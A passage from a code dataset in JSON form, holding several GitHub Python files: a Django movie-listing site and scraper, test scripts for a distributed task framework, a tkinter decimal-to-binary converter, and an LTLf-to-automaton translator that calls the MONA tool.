html.find_all(itemprop='season')\n\n for season in raw_seasons_data:\n season_number = season.find(class_='flat').text.split(' ')[0]\n if not int(season_number) in s_values:\n Season.objects.create(number=season_number, movie_id=movie_object.id)\n\n raw_episodes_data = season.find_all(itemprop='episode')\n existing_episodes = s.get(number=season_number).episodes.all().values_list('number', flat=True)\n episode_number = 1\n for episode in reversed(raw_episodes_data):\n if not episode_number in existing_episodes:\n name = episode.find(itemprop='name').text\n try:\n date = parse(episode.find(itemprop='datePublished').text)\n except ValueError:\n date = None\n Episode.objects.create(number=episode_number,\n name=name,\n date=date,\n movie_id=movie_object.id,\n season_id=s.get(number=season_number).id)\n episode_number += 1\n\n\n\n# Collect data about all movies. It can takes for a long time, use it carefully\ndef full_data():\n main_page = requests.get(URL + 'search/all/')\n html = BeautifulSoup(main_page.text, \"html.parser\")\n\n pages_counter = html.find(class_='paginator').find_all('li')[-2].text\n for p_number in range(int(pages_counter) + 1):\n page = requests.get(URL + 'search/all/?page=' + str(p_number))\n page_html = BeautifulSoup(page.text, \"html.parser\")\n page_links = page_html.findAll('table')[1].findAll('tr')[1::]\n\n # collect all movies id on the page\n ids = re.findall('/(\\d+)/', str(page_links))\n\n for external_id in ids:\n collect_movie(external_id)"
},
{
"alpha_fraction": 0.6933584809303284,
"alphanum_fraction": 0.7070183753967285,
"avg_line_length": 27.30666732788086,
"blob_id": "0bd8b82bb06c2da5ff230c4049a4f72b45419adc",
"content_id": "a1e94f25c8459822085f691a616707192e0590ed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2123,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 75,
"path": "/shows/views.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.shortcuts import get_object_or_404\nfrom django.views.generic import ListView, DetailView\nfrom django.db.models import Q\nfrom django.contrib.postgres.search import SearchVector\n\nfrom .models import Movie\n\n\nclass BaseListView(ListView):\n\tmodel = Movie\n\tordering = ('-imdb',)\n\tpaginate_by = 9\n\ttemplate_name = 'shows/main_content.html'\n\tcontext_object_name = 'movies_list'\n\n\nclass MainPageView(BaseListView):\n\tallow_empty = False\n\n\tdef get_context_data(self, **kwargs):\n\t\t# add to context 10 random top rated movies for carousel\n\n\t\tcontext = super().get_context_data(**kwargs)\n\t\tcontext['random_top_movies'] = Movie.objects.filter(imdb__gte=9).order_by('-kp')[:10]\n\t\treturn context\n\n\nclass RatingView(BaseListView):\n\n\tdef get_queryset(self):\n\t\trating = self.kwargs.get('rating', None)\n\t\tallowed_kwargs = ('top_250', 'top_imdb', 'top_kp')\n\n\t\tif not rating:\n\t\t\treturn super().get_queryset()\n\n\t\tif rating not in allowed_kwargs:\n\t\t\treturn None\n\t\telse:\n\t\t\tif rating == 'top_250':\n\t\t\t\t# get objects with the biggest average rating score\n\t\t\t\tunsorted_results = Movie.objects.filter(Q(imdb__gte=7) & Q(kp__gte=7))\n\t\t\t\treturn sorted(unsorted_results, key=lambda avg: avg.get_average(), reverse=True)[:250]\n\t\t\telif rating == 'top_imdb':\n\t\t\t\treturn Movie.objects.order_by('-imdb')[:100]\n\t\t\telif rating == 'top_kp':\n\t\t\t\treturn Movie.objects.order_by('-kp')[:100]\n\n\nclass SearchView(BaseListView):\n\tallow_empty = True\n\n\tdef get_queryset(self):\n\t\tvector = SearchVector('first_title', 'second_title')\n\t\treturn Movie.objects.annotate(search=vector).filter(search=self.request.GET.get('q'))\n\n\tdef get_context_data(self, **kwargs):\n\t\tcontext = super().get_context_data(**kwargs)\n\n\t\tsearch_params = self.request.GET.get('q', None)\n\t\tif search_params:\n\t\t\tcontext['q'] = f\"q={self.request.GET.get('q', None)}&\"\n\n\t\treturn context\n\n\nclass MovieDetail(DetailView):\n\tmodel = Movie\n\ttemplate_name = 'shows/item_content.html'\n\tcontext_object_name = 'movie'\n\tpk_url_kwarg = 'external_id'\n\n\tdef get_object(self, queryset=None):\n\t\tmovie = get_object_or_404(Movie.objects.select_related(), external_id=self.kwargs['external_id'])\n\t\treturn movie\n"
},
{
"alpha_fraction": 0.7801608443260193,
"alphanum_fraction": 0.7801608443260193,
"avg_line_length": 33,
"blob_id": "74a20814ad8cba0cbd985d085e28e2d5a63d1ed8",
"content_id": "5bf5707e88f83aaa0a622b603621bcb23b5f7c4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 373,
"license_type": "no_license",
"max_line_length": 48,
"num_lines": 11,
"path": "/accounts/views.py",
"repo_name": "moffire/shows_guide",
"src_encoding": "UTF-8",
"text": "from django.urls import reverse_lazy\nfrom django.views.generic import TemplateView\nfrom django.views.generic.edit import CreateView\n\nclass SignUpView(CreateView):\n # form_class = CustomUserCreationForm\n success_url = reverse_lazy('login')\n template_name = 'registration/signup.html'\n\nclass ProfileView(TemplateView):\n template_name = 'profile/user_profile.html'"
}
] | 7 |
Gaslox/distributed_framework
|
https://github.com/Gaslox/distributed_framework
|
68631cfc1f0d43eb9c8a499504902dbe42fd1511
|
ac224d62949973f7dd644e46ac29d8406f148eae
|
efb49604e353483ab1b94afa9194b68fc6744e4e
|
refs/heads/master
| 2023-08-29T23:08:58.363318 | 2021-11-18T02:44:05 | 2021-11-18T02:44:05 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6949806809425354,
"alphanum_fraction": 0.739382266998291,
"avg_line_length": 31.4375,
"blob_id": "01edce6659811b69642b098b4dd2677b2c417f87",
"content_id": "9c7d4f7cee7ce4d511621fcb806625d9388524dd",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 714,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 16,
"path": "/test_frame/test_rabbitmq/test_rabbitmq_consume.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "import time\nimport random\nfrom function_scheduling_distributed_framework import task_deco,BrokerEnum\n\n@task_deco('test_rabbit_queue7',broker_kind=BrokerEnum.RABBITMQ_AMQPSTORM,qps=2,)\ndef test_fun(x):\n # time.sleep(2.9)\n # sleep时间随机从0.1毫秒到5秒任意徘徊,最小耗时和最大耗时差距达到了5万倍。\n # 传统的恒定并发数量的线程池对未知的耗时任务且波动达到了5万倍,持续100次每秒的精确控频无能为力,\n # 但此框架只要简单设置一个qps就自动达到了这个目的。\n random_sleep = random.randrange(1,50000) / 10000\n time.sleep(random_sleep)\n print(x,random_sleep)\n\nif __name__ == '__main__':\n test_fun.consume()"
},
{
"alpha_fraction": 0.48076921701431274,
"alphanum_fraction": 0.5528846383094788,
"avg_line_length": 26.799999237060547,
"blob_id": "a37b290e23b19c890c85a72333fdbc082e640a2b",
"content_id": "2b5b36d504ced8967cd0055e88b7891bbc98a4a8",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 434,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 15,
"path": "/test_frame/test_broker/test_publish.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "import time\n\nfrom test_frame.test_broker.test_consume import f\n\n# f.clear()\n# for i in range(1000000):\n# # time.sleep(0.2)\n# if i == 0:\n# print(time.strftime(\"%H:%M:%S\"), '发布第一条')\n# if i == 99999:\n# print(time.strftime(\"%H:%M:%S\"), '发布第100000条')\n# f.push(i, i * 2)\n\nif __name__ == '__main__':\n f.multi_process_pub_params_list([{'x':i,'y':2*i} for i in range(100000)],process_num=5)"
},
{
"alpha_fraction": 0.6093959808349609,
"alphanum_fraction": 0.6476510167121887,
"avg_line_length": 34.47618865966797,
"blob_id": "14865e4eab361b5c57e8dff32c6534053f102565",
"content_id": "49aa74e9ff8c69f1983f5082ea0b601fd31fedc6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "permissive",
"max_line_length": 164,
"num_lines": 42,
"path": "/test_frame/test_broker/test_consume.py",
"repo_name": "Gaslox/distributed_framework",
"src_encoding": "UTF-8",
"text": "# from auto_run_on_remote import run_current_script_on_remote\n# run_current_script_on_remote()\nimport json\nimport os\nimport time\nimport random\n# from distributed_frame_config import REDIS_HOST\nfrom function_scheduling_distributed_framework import task_deco, BrokerEnum, ConcurrentModeEnum\nfrom function_scheduling_distributed_framework.utils import RedisMixin\n\nprint(BrokerEnum)\nprint(BrokerEnum.REDIS)\nprint(BrokerEnum.NATS)\n\n# @task_deco('test_queue66', broker_kind=BrokerEnum.RABBITMQ_AMQPSTORM, qps=5, log_level=10, is_print_detail_exception=False, is_show_message_get_from_broker=False,\n# is_using_distributed_frequency_control=True)\n@task_deco('test_queue66c', qps=50,broker_kind=BrokerEnum.NATS,concurrent_num=100,log_level=10)\ndef f(x, y):\n # print(f'函数开始执行时间 {time.strftime(\"%H:%M:%S\")}')\n # time.sleep(10)\n # # if x %10 == 0:\n # # print(x)\n #\n # print(f''' pid:{os.getpid()}, {int(time.time())} 计算 {x} + {y} = {x + y}''')\n # # time.sleep(0.7)\n # # time.sleep(6)\n # print(x, y)\n return x + y\n\n\nif __name__ == '__main__':\n # pass\n # f.clear()\n # for i in range(10):\n # f.push(i, y=i * 2)\n # f.multi_process_pub_params_list([{'x':i,'y':i*3} for i in range(100000)],process_num=2)\n # r.lpush(json.dumps({'x':i,'y':i*2}))\n # f.consume()\n # f.fabric_deploy('192.168.114.137',22,'ydf','372148',sftp_log_level=10)\n f.multi_process_consume(2)\n # f.consume()\n # f.wait_for_possible_has_finish_all_tasks()\n"
}
] | 3 |
pouya-py/tkinter
|
https://github.com/pouya-py/tkinter
|
877ad370a0aa7c2660d52b6bceaffbedb1db9035
|
98163f6262a7a0875552448bfd7a5b8d18510af1
|
76dba54daf4dff1cedb12987288d12855881ae44
|
refs/heads/main
| 2023-09-04T06:45:44.435196 | 2021-09-05T09:24:03 | 2021-09-05T09:24:03 | 403,264,349 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5430412292480469,
"alphanum_fraction": 0.5644329786300659,
"avg_line_length": 27.063671112060547,
"blob_id": "f6e8f5be0da002845143825b82ad64194cc4f1e8",
"content_id": "efad7dc7005dd030dfe40572c25eede77a3f9c50",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7760,
"license_type": "no_license",
"max_line_length": 104,
"num_lines": 267,
"path": "/main.py",
"repo_name": "pouya-py/tkinter",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\r\nfrom tkinter import messagebox\r\nimport tkinter.ttk as ttk\r\nimport tkinter.font as font\r\n\r\n\r\ndef binary_fraction(num ,n):\r\n binary =[]\r\n temporary_num = num\r\n while num != 1.0 and n != 0:\r\n num = num * 2\r\n output2.insert(\"insert\",f\" {temporary_num} * 2 ={num}\\n\")\r\n\r\n if num == 1.0:\r\n binary.append(1)\r\n output2.insert(\"end\", \"take 1 and finish:\\n\")\r\n output2.insert(\"end\",binary)\r\n output2.insert(\"end\",\"\\n\")\r\n return binary\r\n\r\n if num < 1:\r\n binary.append(0)\r\n if n-1 == 0:\r\n output2.insert('insert','Done we got to your precision\\n')\r\n return binary\r\n output2.insert(\"insert\", f\"Take 0 then multiply ({num}) with 2\\n\")\r\n n -= 1\r\n temporary_num = num\r\n\r\n if num > 1:\r\n binary.append(1)\r\n num = str(num)\r\n num = float(\".\" + num.split(\".\")[1])\r\n temporary_num = num\r\n if n-1 == 0:\r\n output2.insert('insert','Done we got to your precision\\n')\r\n return binary\r\n output2.insert(\"insert\",f\"Take 1 then multiply fraction({num}) part with 2\\n\")\r\n n -= 1\r\n\r\n\r\n return binary\r\n\r\ndef Integral_part(number):\r\n binary = []\r\n if number == 0:\r\n binary.append(0)\r\n output2.insert(\"end\", binary)\r\n output2.insert(\"insert\", \"\\n\")\r\n output2.insert(\"insert\", \"================\\n\")\r\n return binary\r\n\r\n while number != 0:\r\n rem = int(number % 2)\r\n output2.insert(\"insert\",f\"{int(number)}/2 =>\")\r\n output2.insert(\"insert\",f\"remainder:{rem}\")\r\n output2.insert(\"insert\", \"\\n\")\r\n binary.append(rem)\r\n Quotient = number // 2\r\n output2.insert(\"insert\", f\"Quotient:{int(Quotient)}\\n\")\r\n number = Quotient\r\n\r\n if Quotient == 0:\r\n output2.insert(\"end\", \"now just writing remainder from bottom to top\\n\")\r\n binary.reverse()\r\n output2.insert(\"end\", binary)\r\n output2.insert(\"insert\", \"\\n\")\r\n output2.insert(\"insert\", \"================\\n\")\r\n\r\n return binary\r\n\r\n output1.insert(\"end\", binary)\r\n\r\ndef add_one(li):\r\n if li[-1] == 0:\r\n li[-1] = 1\r\n return li\r\n else:\r\n li[-1] = 0\r\n for i in range(2, len(li)+1):\r\n if li[-i] == 1:\r\n li[-i] = 0\r\n\r\n else:\r\n li[-i] = 1\r\n return li\r\n return [1] + li\r\n\r\ndef not_list(n):\r\n for i in range(0,len(n)):\r\n if n[i] == 0:\r\n n[i] = 1\r\n else:\r\n n[i] = 0\r\n return n\r\n\r\n\r\n\r\n\r\ndef main():\r\n #get user input\r\n number = entry1.get()\r\n n = entry2.get()\r\n try:\r\n number = float(number)\r\n # Show a message box if the users input was invalid\r\n except:\r\n clear_field()\r\n messagebox.askretrycancel('Error', \" Invalid Input,just numbers!\")\r\n\r\n\r\n #this is where the user input is integer\r\n if number - int(number) == 0.0 and number > 0 :\r\n binary = Integral_part(number)\r\n output1.insert(\"insert\",binary)\r\n\r\n if number == 0:\r\n binary = Integral_part(number)\r\n output1.insert(\"insert\", binary)\r\n\r\n #this is where the input is not integer\r\n if number - int(number) != 0.0 :\r\n\r\n if n != \"\":\r\n try:\r\n n = int(n)\r\n except:\r\n messagebox.askretrycancel('Error', \" Invalid Input,just numbers!\")\r\n return\r\n else:\r\n #default precision\r\n n = 10\r\n fpart = int(number)\r\n output2.insert(\"insert\" , f\" < Integral part = {fpart}>\\n \")\r\n string_num = str(number)\r\n separt = float(\".\" + string_num.split(\".\")[1])\r\n #binary of first part\r\n f_part = Integral_part(fpart)\r\n output2.insert(\"insert\", f\" <Fraction part = {separt}>\\n\")\r\n #binary of second part\r\n se_part = binary_fraction(separt,n)\r\n binary = f_part +[\".\"] + se_part\r\n output2.insert(\"end\" , f\"Now concatinate {f_part} + {se_part} =\\n\")\r\n output2.insert(\"insert\", binary)\r\n output1.insert(\"insert\", binary)\r\n\r\n if number < 0.0 :\r\n output2.insert(\"insert\",f\"First calculate Binary of {-(int(number))} : \\n\")\r\n binary_num = Integral_part(-number)\r\n output2.insert(\"end\", f\"\\nComplement_1 for {binary_num} ==>\")\r\n complement = not_list(binary_num)\r\n output2.insert(\"end\", complement)\r\n output2.insert(\"end\",f\"\\n\\ncomplement 2 = complement_1 + 1 ==>\")\r\n result = add_one(complement)\r\n output2.insert(\"end\",result)\r\n result = [1] + result\r\n output2.insert(\"end\",\"\\nresult:\")\r\n output2.insert(\"end\", \"\\n\")\r\n output2.insert(\"end\",result)\r\n\r\n output1.insert(\"end\", result)\r\n\r\n\r\n\r\n\r\n#Functions to exit the program\r\ndef exit_program():\r\n root.destroy()\r\n\r\n#Function to clear_fields\r\ndef clear_field():\r\n entry1.delete(0,\"end\")\r\n entry2.delete(0, \"end\")\r\n output2.delete(1.0,\"end\")\r\n output1.delete(1.0, \"end\")\r\n\r\n\r\nroot = tk.Tk()\r\nroot.geometry(\"1200x500\")\r\nroot.title(\"Decimal to Binary Converter\")\r\n#root.resizable(False, False)\r\n\r\n\r\n\r\nframe = tk.Frame(root)\r\nframe.pack(fill='none' ,side='top')\r\n\r\n\r\noutput1_frame = tk.Frame(root)\r\noutput1_frame.pack(side = 'left')\r\n\r\n\r\n\r\nmain_frame = tk.Frame(root)\r\nmain_frame.pack(fill='both' , expand=1,side='right')\r\n\r\nmy_canvas = tk.Canvas(main_frame)\r\nmy_canvas.pack(side='right',fill='both', expand = 1)\r\nsecond_frame = tk.Frame(my_canvas)\r\n\r\n#button frame\r\nbutton_frame =tk.Frame(root)\r\nbutton_frame.pack(side='bottom')\r\n\r\n\r\n\r\nlabel1 = tk.Label(frame,text = \"Type a number you want to convert :\")\r\nlabel1.pack(side='top',expand=1)\r\n\r\n#entry field\r\nentry1 = tk.Entry(frame)\r\nentry1.pack(side='top',expand=1)\r\n#entry label\r\nlabel_entry2 = tk.Label(frame , text =\"If it's float ,type a precision for floating point(default=10):\")\r\nlabel_entry2.pack(side='top')\r\n#entry field\r\nentry2 = tk.Entry(frame)\r\nentry2.pack(side= 'top')\r\n\r\nmyfont = font.Font(family='couriel',size='10',weight='bold')\r\n\r\n#button convert\r\nbutton_convert = tk.Button(frame,text=\"Convert\",command=main,bg='black',fg='white')\r\nbutton_convert.pack(side='bottom')\r\nbutton_convert['font'] = myfont\r\n\r\n\r\n#exit and clear button\r\nbtn_exit = tk.Button(button_frame,text = \"Exit\" , command=exit_program,bg='black',fg='red')\r\nbtn_exit.pack(side='right',fill='none')\r\nbtn_exit['font'] = myfont\r\nbtn_clear = tk.Button(button_frame,text=\"Clear\" ,command = clear_field,bg='black',fg='red')\r\nbtn_clear['font'] = myfont\r\nbtn_clear.pack(side='right',fill='none')\r\n\r\n#result label\r\nlabel2 = tk.Label(output1_frame , text =\"Result=> \")\r\nlabel2.pack(side='left')\r\n\r\n#result field\r\noutput1 = tk.Text(output1_frame,width = 50, height = 100)\r\noutput1.pack(side='right',expand=1,fill='both')\r\n\r\n\r\n\r\n\r\n\r\n#procedure field\r\nlabel3 = tk.Label(main_frame , text =\"Procedures ==>\")\r\nlabel3.pack(side='left',expand=1)\r\nmy_canvas.create_window((0,0), window=second_frame,anchor=\"nw\")\r\noutput2 = tk.Text(second_frame , width = 50 , height = 100)\r\noutput2.pack(fill='both',expand=1,side='right')\r\nscrollb = ttk.Scrollbar(main_frame, orient='vertical',command = my_canvas.yview)\r\noutput2.configure(yscrollcommand =scrollb.set)\r\nscrollb.pack(side='right',fill='y')\r\nscrollb1 = ttk.Scrollbar(main_frame, orient='horizontal',command = my_canvas.xview)\r\nscrollb1.pack(side='bottom',fill='y')\r\n\r\nmy_canvas.configure(yscrollcommand=scrollb.set)\r\nmy_canvas.configure(xscrollcommand=scrollb1.set)\r\noutput2.bind('<Configure>',lambda e: my_canvas.configure(scrollregion = my_canvas.bbox(\"all\")))\r\n\r\n\r\n\r\n\r\nroot.mainloop()\r\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 65,
"blob_id": "2d1b537f44e6bbc69d6bc9fb4d612b8a219ada50",
"content_id": "33975cd0a4ed71bda9fa33c00bcd86efb5b63bbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 4,
"path": "/README.md",
"repo_name": "pouya-py/tkinter",
"src_encoding": "UTF-8",
"text": "# tkinter\nDecimal to binary with tkinter \nIn this code snippet i created a tkinter application with GUI window to convert a decimal number into a binary number.\nAlso this window has two frames which are going to show the result and the process to get that result. \n"
}
] | 2 |
francescofuggitti/LTLf2DFA
|
https://github.com/francescofuggitti/LTLf2DFA
|
4d049f2698e49bdf1711ebe9d6f7755f2e889c43
|
434ceb1fd4e6c58b6254c4c6cf0bf7fc228c9e89
|
8f90fceb324c2ecd69c07bfc5acf329da86cf307
|
refs/heads/master
| 2020-03-10T11:57:50.101988 | 2018-09-25T18:49:51 | 2018-09-25T18:49:51 | 129,366,709 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.44104745984077454,
"alphanum_fraction": 0.4515875577926636,
"avg_line_length": 49.081966400146484,
"blob_id": "0879b4fe3031f76e1425351df9dcf901edfbf891",
"content_id": "35a3aa199a8a114a43cae7a05a716e6aa9bbcd43",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15275,
"license_type": "permissive",
"max_line_length": 208,
"num_lines": 305,
"path": "/ltlf2dfa/Translator.py",
"repo_name": "francescofuggitti/LTLf2DFA",
"src_encoding": "UTF-8",
"text": "from ltlf2dfa.Parser import MyParser\nimport itertools as it\nimport subprocess\nimport os, sys, re\nimport pkg_resources\n\nclass Translator:\n\n def __init__(self, formula):\n self.headerMona = \"m2l-str;\\n\"\n self.alphabet = []\n self.formula_to_be_parsed = formula\n self.formulaType = self.search_mixed_formula()\n self.parsed_formula = None\n self.translated_formula = None\n\n def formula_parser(self):\n if self.formulaType in {1,2,3}:\n self.compute_alphabet()\n parser = MyParser()\n self.parsed_formula = parser(self.formula_to_be_parsed)\n else: raise ValueError('Ooops! You typed a formula with mixed past/future operators')\n\n def tuple_to_string(self):\n return '_'.join(str(self.formula_to_be_parsed))\n\n def search_mixed_formula(self):\n '''\n search_mixed_formula() possible outputs:\n 0: formula is mixed\n 1: formula is only future\n 2: formula is only past\n 3: formula is only present\n '''\n formula_to_check_str = self.tuple_to_string()\n separated_formula = formula_to_check_str.split('_')\n\n past_operators = []\n future_operators = []\n for character in separated_formula:\n if character.isupper():\n if character in {'X','F','G','U', 'W', 'R'}: future_operators.append(character)\n elif character in {'Y','O','H','S'}: past_operators.append(character)\n else: continue\n else: continue\n\n if not past_operators and future_operators:\n return 1\n elif past_operators and not future_operators:\n return 2\n elif not past_operators and not future_operators:\n return 3\n else:\n return 0\n\n def rem_duplicates_order(self, seq):\n seen = set()\n seen_add = seen.add\n return [x for x in seq if not (x in seen or seen_add(x))]\n\n def compute_alphabet(self):\n\n symbols = re.findall('(?<![a-z])(?!true|false)[_a-z0-9]+', str(self.formula_to_be_parsed))\n _symbols = self.rem_duplicates_order(symbols)\n self.alphabet = [character.upper() for character in _symbols]\n\n def compute_declare_assumption(self):\n pairs = list(it.combinations(self.alphabet, 2))\n\n if pairs:\n first_assumption = \"~(ex1 y: 0<=y & y<=max($) & ~(\"\n for symbol in self.alphabet:\n if symbol == self.alphabet[-1]: first_assumption += 'y in '+ symbol +'))'\n else : first_assumption += 'y in '+ symbol +' | '\n\n second_assumption = \"~(ex1 y: 0<=y & y<=max($) & ~(\"\n for pair in pairs:\n if pair == pairs[-1]: second_assumption += '(y notin '+ pair[0]+' | y notin '+pair[1]+ ')));'\n else: second_assumption += '(y notin '+ pair[0]+' | y notin '+pair[1]+ ') & '\n\n return first_assumption +' & '+ second_assumption\n else:\n return None\n\n def translate(self):\n self.translated_formula = translate_bis(self.parsed_formula, self.formulaType, var='v_0')+\";\\n\"\n\n def buildMonaProgram(self, flag_for_declare):\n if not self.alphabet and not self.translated_formula:\n raise ValueError\n else:\n if flag_for_declare:\n if self.compute_declare_assumption() is None:\n if self.alphabet:\n return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula\n else:\n return self.headerMona + self.translated_formula\n else: return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula + self.compute_declare_assumption()\n else:\n if self.alphabet:\n return self.headerMona + 'var2 ' + \", \".join(self.alphabet) + ';\\n' + self.translated_formula\n else:\n return self.headerMona + self.translated_formula\n\n def createMonafile(self, flag):\n program = self.buildMonaProgram(flag)\n try:\n with open('./automa.mona', 'w+') as file:\n file.write(program)\n file.close()\n except IOError:\n print('Problem with the opening of the file!')\n\n def invoke_mona(self, path='./inter-automa'):\n if sys.platform == 'linux':\n package_dir = os.path.dirname(os.path.abspath(__file__))\n mona_path = pkg_resources.resource_filename('ltlf2dfa','mona')\n if os.access(mona_path, os.X_OK): # check if mona is executable\n try:\n subprocess.call(package_dir+'/./mona -u -gw ./automa.mona > ' + path + '.dot', shell=True)\n except subprocess.CalledProcessError as e:\n print(e)\n exit()\n except OSError as e:\n print(e)\n exit()\n else:\n print('[ERROR]: MONA tool is not executable...')\n exit()\n else:\n try:\n subprocess.call('mona -u -gw ./automa.mona > ' + path + '.dot', shell=True)\n except subprocess.CalledProcessError as e:\n print(e)\n exit()\n except OSError as e:\n print(e)\n exit()\n\ndef translate_bis(formula_tree, _type, var):\n if type(formula_tree) == tuple:\n #enable this print to see the tree pruning\n # print(self.parsed_formula)\n # print(var)\n if formula_tree[0] == '&':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n b = translate_bis(formula_tree[2], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n b = translate_bis(formula_tree[2], _type, '0')\n else:\n a = translate_bis(formula_tree[1], _type, var)\n b = translate_bis(formula_tree[2], _type, var)\n if a == 'false' or b == 'false':\n return 'false'\n elif a == 'true':\n if b == 'true': return 'true'\n else: return b\n elif b == 'true': return a\n else: return '('+a+' & '+b+')'\n elif formula_tree[0] == '|':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n b = translate_bis(formula_tree[2], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n b = translate_bis(formula_tree[2], _type, '0')\n else:\n a = translate_bis(formula_tree[1], _type, var)\n b = translate_bis(formula_tree[2], _type, var)\n if a == 'true' or b == 'true':\n return 'true'\n elif a == 'false':\n if b == 'true': return 'true'\n elif b == 'false': return 'false'\n else: return b\n elif b == 'false': return a\n else: return '('+a+' | '+b+')'\n elif formula_tree[0] == '~':\n # print('computed tree: '+ str(self.parsed_formula))\n if var == 'v_0':\n if _type == 2:\n a = translate_bis(formula_tree[1], _type, 'max($)')\n else:\n a = translate_bis(formula_tree[1], _type, '0')\n else: a = translate_bis(formula_tree[1], _type, var)\n if a == 'true': return 'false'\n elif a == 'false': return 'true'\n else: return '~('+ a +')'\n elif formula_tree[0] == 'X':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type, new_var)\n if var == 'v_0':\n return '('+ 'ex1 '+new_var+': '+ new_var +' = 1 '+ '& '+ a +')'\n else:\n return '('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' + 1 '+ '& '+ a +')'\n elif formula_tree[0] == 'U':\n # print('computed tree: '+ str(self.parsed_formula))\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_var)\n b = translate_bis(formula_tree[1], _type,new_new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+ a +' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n elif a == 'false': return 'false'\n else: return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+ a +' & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' < '+new_var+' => '+b+' )'\n\n elif formula_tree[0] == 'W':\n new_var = _next(var)\n a = translate_bis(formula_tree[1], _type, new_var)\n if var == 'v_0':\n return '(0 = max($)) | ('+ 'ex1 '+new_var+': '+ new_var +' = 1 '+ '& '+ a +')'\n else:\n return '('+ var +' = max($)) | ('+ 'ex1 '+new_var+': '+ new_var +' = '+ var + ' + 1 '+ '& '+ a +')'\n\n elif formula_tree[0] == 'R':\n new_var = _next(var)\n new_new_var = _next(new_var)\n a = translate_bis(formula_tree[2], _type,new_new_var)\n b = translate_bis(formula_tree[1], _type,new_var)\n\n if var == 'v_0':\n if b == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+b+')'\n elif b == 'false': return '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else: return '( '+ 'ex1 '+new_var+': 0 <= '+new_var+' & '+new_var+' <= max($) & '+ b +' & all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': 0 <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else:\n if b == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= '+new_var+' => '+a+' ) |'\\\n '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n elif a == 'true': return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & '+new_var+' <= max($) & '+b+')'\n elif b == 'false': return '(all1 '+new_new_var+': '+var+' <= '+new_new_var+' & '+new_new_var+' <= max($) => '+a+' )'\n else: return '( '+ 'ex1 '+new_var+': '+var+' <= '+new_var+' & 